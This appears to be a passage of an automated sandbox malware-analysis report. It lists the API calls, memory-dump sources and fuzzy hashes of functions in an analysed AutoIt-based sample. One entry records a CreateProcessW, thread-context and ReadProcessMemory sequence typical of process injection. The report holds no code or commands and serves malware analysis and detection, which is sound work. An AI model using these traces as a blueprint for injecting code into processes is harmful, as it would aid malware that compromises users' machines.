                                                    • Opcode Fuzzy Hash: 58ddbfe1b93e486c5de8325581b6ed458fed8e9b8fe2c0c962bfefebb47c1076
                                                    • Instruction Fuzzy Hash: C3F0F934505A7EA6CB20AE54FC159DF7BAE9F01350F100029FC0496681EFB08AD48AD4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: 78ead63793243b025359501065f8ef4f6ab381d7402cc3371d3dbeed001164be
                                                    • Instruction ID: 2bbbe1a7b1c2d071e2031555ec72a09f9c2e9f410332d0558708826ef27e26a4
                                                    • Opcode Fuzzy Hash: 78ead63793243b025359501065f8ef4f6ab381d7402cc3371d3dbeed001164be
                                                    • Instruction Fuzzy Hash: FB01B171C01E39EBCF72AF69AC018CE7B63AF80360F044219B8145B2A1DBB58A11DF95
                                                    APIs
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    • __lock_file.LIBCMT ref: 0062561B
                                                      • Part of subcall function 00626E4E: __lock.LIBCMT ref: 00626E71
                                                    • __fclose_nolock.LIBCMT ref: 00625626
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 2f1dcc22039d967336541d072c8dcfe6da40ccba14eb604aadc631203fafd47c
                                                    • Instruction ID: 4d1a0d8269042a346a6190da232577a34ac74799b4662ad9220894dc3bb6e4b7
                                                    • Opcode Fuzzy Hash: 2f1dcc22039d967336541d072c8dcfe6da40ccba14eb604aadc631203fafd47c
                                                    • Instruction Fuzzy Hash: 93F0F071801E319ED7B0AB74AC027AE77A32F40334F55820EA412AB1D2CFBC89028F59
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03941A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03941AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03941B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                    • Instruction ID: 532f1ef2578a9ab6d3f6f0014fd6c3d9a06df154dc5543ac2c338bb98e345c25
                                                    • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                    • Instruction Fuzzy Hash: F412CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 026945d6fde0e333cfb9ac7fc192e348a422843008121fd4392485f5530f3e18
                                                    • Instruction ID: 14ecaf49a8440737b8d19a505abafdf53364de21ebcf77bcb3b319d84c9f6839
                                                    • Opcode Fuzzy Hash: 026945d6fde0e333cfb9ac7fc192e348a422843008121fd4392485f5530f3e18
                                                    • Instruction Fuzzy Hash: F161BC7064020A9FDB28DF64C981BABB7F6EF04304F14807DE9069B682EB71ED52CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3606244d6b8e7d088e8e2a14b219ca692a20a850ca4c4892f7fd2e493d7b2a2
                                                    • Instruction ID: 2199e66e48a655e401bc549efcf8b4dd1b27f8f7e835a401821d342e170c8dde
                                                    • Opcode Fuzzy Hash: c3606244d6b8e7d088e8e2a14b219ca692a20a850ca4c4892f7fd2e493d7b2a2
                                                    • Instruction Fuzzy Hash: 35518F34640605AFCF58EB54C996EAE77A7AF45310F18806CF906AB3D2CB30ED45CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                                                    • Instruction ID: 8409139ecda6aab687b041c7e25e70bfb22f588894e3fb0e87db5e8cf598f1ab
                                                    • Opcode Fuzzy Hash: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                                                    • Instruction Fuzzy Hash: 6E31D679A48A12DFC7289F18D190962F7A2FF09350714C56DE84A8B3E5E730FC81CB84
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00605CF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: d764f28be66d354061ff6143a7819eedec1072191f8624aef05a66321b616af6
                                                    • Instruction ID: 46f1f3d99f7c62cc289533efb0ad0eedfc361e973b50c0bf5f130550557298c1
                                                    • Opcode Fuzzy Hash: d764f28be66d354061ff6143a7819eedec1072191f8624aef05a66321b616af6
                                                    • Instruction Fuzzy Hash: 97315C31A40B09ABDB18DF29C48469EB7B6FF48310F14862AD81A97790D731A950DF94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: bff4b5c66a23294cb2950edad3d17236961649a73631c7a3dae682d33c6c10f2
                                                    • Instruction ID: 30986064217daacf280cd52ae9f5ef6137dff1612b2b860132d804144437e9fa
                                                    • Opcode Fuzzy Hash: bff4b5c66a23294cb2950edad3d17236961649a73631c7a3dae682d33c6c10f2
                                                    • Instruction Fuzzy Hash: 51414774548351CFDB28DF54C484B5ABBE2BF45318F09889CE9898B3A2C732E885CB52
                                                    APIs
                                                      • Part of subcall function 00604D13: FreeLibrary.KERNEL32(00000000,?), ref: 00604D4D
                                                      • Part of subcall function 0062548B: __wfsopen.LIBCMT ref: 00625496
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604F6F
                                                      • Part of subcall function 00604CC8: FreeLibrary.KERNEL32(00000000), ref: 00604D02
                                                      • Part of subcall function 00604DD0: _memmove.LIBCMT ref: 00604E1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: 1d016abec4c76b19fdcea4e63b069478453136a15c4526c681de818ca8c1816f
                                                    • Instruction ID: 4b8f27062edb966d2154854fcba3d0b62d6b84802031bdea8f81d5cf353f569b
                                                    • Opcode Fuzzy Hash: 1d016abec4c76b19fdcea4e63b069478453136a15c4526c681de818ca8c1816f
                                                    • Instruction Fuzzy Hash: 06110D71640706ABCB68FF70DC12F9F77A79F44710F10842DF642A62C1DE715A159B94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 5cc2792954fe61d1346ad03d8ac6a4b0050bc573fe264392324234a0ba4517d4
                                                    • Instruction ID: 7f5f4f5e3797bb364d3836948f89ed4efa19ae886bbe9acb4437e240b278dcc1
                                                    • Opcode Fuzzy Hash: 5cc2792954fe61d1346ad03d8ac6a4b0050bc573fe264392324234a0ba4517d4
                                                    • Instruction Fuzzy Hash: 47214474548351DFCB18DF54C444A5BBBE2BF89344F04896CE98A4B3A2D731E845CB52
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00605807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00605D76
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 5bdbf36e3f90b83850c2e0e0b8823cc3c748ee78a6fc29cda4fd2d74a479e65a
                                                    • Instruction ID: 7085dc088a2fd2015e960fa55e63f2b2cecefde1e4dc915031d9c80d9c5dd3a9
                                                    • Opcode Fuzzy Hash: 5bdbf36e3f90b83850c2e0e0b8823cc3c748ee78a6fc29cda4fd2d74a479e65a
                                                    • Instruction Fuzzy Hash: 4C113631240B019FD3348F15C888BA3B7EAEF45760F10C92EE4AB86A90D7B0E945CF64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
                                                    • Instruction ID: 9a6fb88890c50f9b91efa0641826a184d5b1fee795e0a8c031ab1234d14b8007
                                                    • Opcode Fuzzy Hash: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
                                                    • Instruction Fuzzy Hash: 9D01F9B26447127ED3245F38DC06F67BB99EB447A0F10862EF95ACA2D1EA31F5408B54
                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 006745C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 1431749950-0
                                                    • Opcode ID: 3509d587358b7f7663090cbb56326b8448cddf2c8c68f86667e02a3b75ad6704
                                                    • Instruction ID: 04e90b7cd12704200573e957cf12eb5dc7aa514154bc85af9e73993234459d2c
                                                    • Opcode Fuzzy Hash: 3509d587358b7f7663090cbb56326b8448cddf2c8c68f86667e02a3b75ad6704
                                                    • Instruction Fuzzy Hash: 5CF08135608149AFDB54EBA4D846CAF7BBDEF45320B00405AF805DB251DE70A940CBA4
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00624AD6
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 362d79e66e20e22a93104c133d6487d5cf089ddda49a09934b4e2afc2bc92797
                                                    • Instruction ID: c6c496aba5e0550765485e94ec701b99da5687403f6783d47623ea83cdd6c5e5
                                                    • Opcode Fuzzy Hash: 362d79e66e20e22a93104c133d6487d5cf089ddda49a09934b4e2afc2bc92797
                                                    • Instruction Fuzzy Hash: 9DF08131941A299FDF91AF64EC063DE3663AF00325F054518F8149B1D1CF788951DF59
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604FDE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 3d7ffeb2d25669fc1add654da8d91beb6d1984d1b299082015ad04dd3f6960e8
                                                    • Instruction ID: 739358db1543f457e91f265e8a142a50c2e602d8d6b569ba5950569461410690
                                                    • Opcode Fuzzy Hash: 3d7ffeb2d25669fc1add654da8d91beb6d1984d1b299082015ad04dd3f6960e8
                                                    • Instruction Fuzzy Hash: 16F039B1145B12DFCB389F64E494853BBE3BF443293208A3EE2D782650CB31A840DF40
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006209F4
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 11756d807688dbfd0bc464255041fe7dbc8e2ee230adda796c46be0b87ce14c6
                                                    • Instruction ID: fdc08f9bf59dd5d010e6cb9239a3c4c77c3cf02548b7a93ca2f64ac7b606e64f
                                                    • Opcode Fuzzy Hash: 11756d807688dbfd0bc464255041fe7dbc8e2ee230adda796c46be0b87ce14c6
                                                    • Instruction Fuzzy Hash: 98E0CD36D4422857C720D6989C15FFAB7EEDFC9790F0401B5FC0CD7244D9A0AD8186D4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                    • Instruction ID: 8c1b5e9684b2e22b8b86567ed48eb125b41bfc3f6b0adaa3887a9c221935e27a
                                                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                    • Instruction Fuzzy Hash: 29E092B0104B005FD7348A24D8107E3B3E5AB06315F00081CF6AB83341EB62B8418B69
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0063E16B,?,?,00000000), ref: 00605DBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 599bc60eb5d142ce8b946459659a9d852bbd066e9151f8a322e6a4eab9bbc41c
                                                    • Instruction ID: 0a7523272d942f432b40d8ff05cd96f24c28374820caab7626609dc848028784
                                                    • Opcode Fuzzy Hash: 599bc60eb5d142ce8b946459659a9d852bbd066e9151f8a322e6a4eab9bbc41c
                                                    • Instruction Fuzzy Hash: 77D0C77464020CBFE710DB80DC46FA9777DD705710F200294FD0456290D6B27D508795
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: 8cc2eb7fcba04a731dda632c5181117ae136307e0eccefd65c2bd4938a2e5664
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: D0B0927684060C77DE512E82FC02A697B5A9B44778F808020FB0C18162A673A6A09A8A
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0066D46A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: da66c03d9b74fad4d1059a0939350e66e8d6f8f07dabd408e505e758b17ee08e
                                                    • Instruction ID: b7d0bdbc63e6501759902ff3110419eb25e1e02bbfffe4cac8610f4e39b829f2
                                                    • Opcode Fuzzy Hash: da66c03d9b74fad4d1059a0939350e66e8d6f8f07dabd408e505e758b17ee08e
                                                    • Instruction Fuzzy Hash: AE7140306447018FC758EF28D491AABB7E2AF88354F04496DF8969B3A2DF30ED45CB56
                                                    APIs
                                                    Memory Dump Source
